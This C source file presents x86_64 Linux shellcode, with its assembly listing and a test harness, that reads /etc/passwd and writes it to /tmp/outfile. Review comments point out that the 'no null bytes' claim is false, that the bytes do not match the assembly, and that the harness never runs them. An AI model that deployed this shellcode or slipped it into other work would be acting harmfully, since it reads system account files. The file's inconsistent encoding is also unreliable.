/*
    Reads /etc/passwd and writes the data to /tmp/outfile
    No null bytes

    Author: Chris Higgins <chris@chigs.me>
    @ch1gg1ns -- github.com/chiggins -- http://chigstuff.com/blog/2014/03/29/my-first-shellcode/
    Date: 3-27-2014
    Size: 118 bytes
    Tested: ArchLinux x86_64 3.13.6-1

    Assembly:
        xor rax, rax
        mov al, 2
        xor rdi, rdi
        mov rbx, 0x647773
        push rbx
        mov rbx, 0x7361702f6374652f
        push rbx
        lea rdi, [rsp]
        xor rsi, rsi
        syscall
        mov rbx, rax
        xor rax, rax
        mov rdi, rbx
        mov rsi, rsp
        mov dx, 0xFFFF
        syscall
        mov r8, rax
        mov rax, rsp
        xor rbx, rbx
        push rbx
        mov rbx, 0x656c6966
        push rbx
        mov rbx, 0x74756f2f706d742f
        push rbx
        mov rbx, rax
        xor rax, rax
        mov al, 2
        lea rdi, [rsp]
        xor rsi, rsi
        push 0x66
        pop si
        syscall
        mov rdi, rax
        xor rax, rax
        mov al, 1
        lea rsi, [rbx]
        xor rdx, rdx
        mov rdx, r8
        syscall
*/
#include <stdio.h>
#include <string.h>
/*
 * Raw machine-code bytes stored as a C string literal in a char array.
 *
 * NOTE(review): the literal holds 117 escaped bytes, so sizeof reports 118
 * once the implicit terminating NUL is counted.
 * NOTE(review): the literal contains an embedded \x00, so the "No null
 * bytes" statement in the file header does not hold for this encoding; any
 * C string function (strlen, strcpy, ...) would stop at that byte.
 * NOTE(review): this literal does not look like a byte-exact encoding of the
 * assembly listing in the header -- treat the two as separate artifacts when
 * analysing or writing signatures.
 */
char shellcode[] = "\x48\x31\xc0\xb0\x02\x48\x31\xff\xbb\x73\x77\x64\x00\x53\x48\xbb\x2f\x65\x74\x63\x70\x61\x73\x53\x48\x8d\x3c\x24\x48\x31\xf6\x0f\x05\x48\x89\xc3\x48\x31\xc0\x48\x89\xdf\x48\x89\xe6\x66\xba\xff\xff\x0f\x05\x49\x89\xc0\x48\x89\xe0\x48\x31\xdb\x53\xbb\x66\x69\x6c\x65\x53\x48\xbb\x2f\x74\x6d\x70\x6f\x75\x74\x53\x48\x89\xc3\x48\x31\xc0\xb0\x02\x48\x8d\x3c\x24\x48\x31\xf6\x6a\x66\x66\x5e\x0f\x05\x48\x89\xc7\x48\x31\xc0\xb0\x01\x48\x8d\x33\x48\x31\xd2\x4c\x89\xc2\x0f\x05";
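/*
 * Harness entry point: prints the size of the `shellcode` array and then
 * evaluates an expression that refers to the array as a function.
 *
 * Returns 0.
 */
int main() {
    /*
     * sizeof yields a size_t, so %zu is the matching conversion; passing it
     * to %d is undefined behaviour where size_t is wider than int.
     * The value printed includes the literal's terminating NUL byte.
     */
    printf("len: %zu bytes", sizeof shellcode);

    /*
     * NOTE(review): as written, this statement only converts the array's
     * address to a function pointer and dereferences it; there is no call
     * operator, so the expression is evaluated and discarded and the bytes
     * in `shellcode` are never run by this program.
     * For context: `shellcode` is an ordinary initialized global, which
     * toolchains typically place in a non-executable data section; that
     * NX / W^X policy is the mitigation that faults data-as-code harnesses.
     */
    (*(void (*)()) shellcode);

    return 0;
}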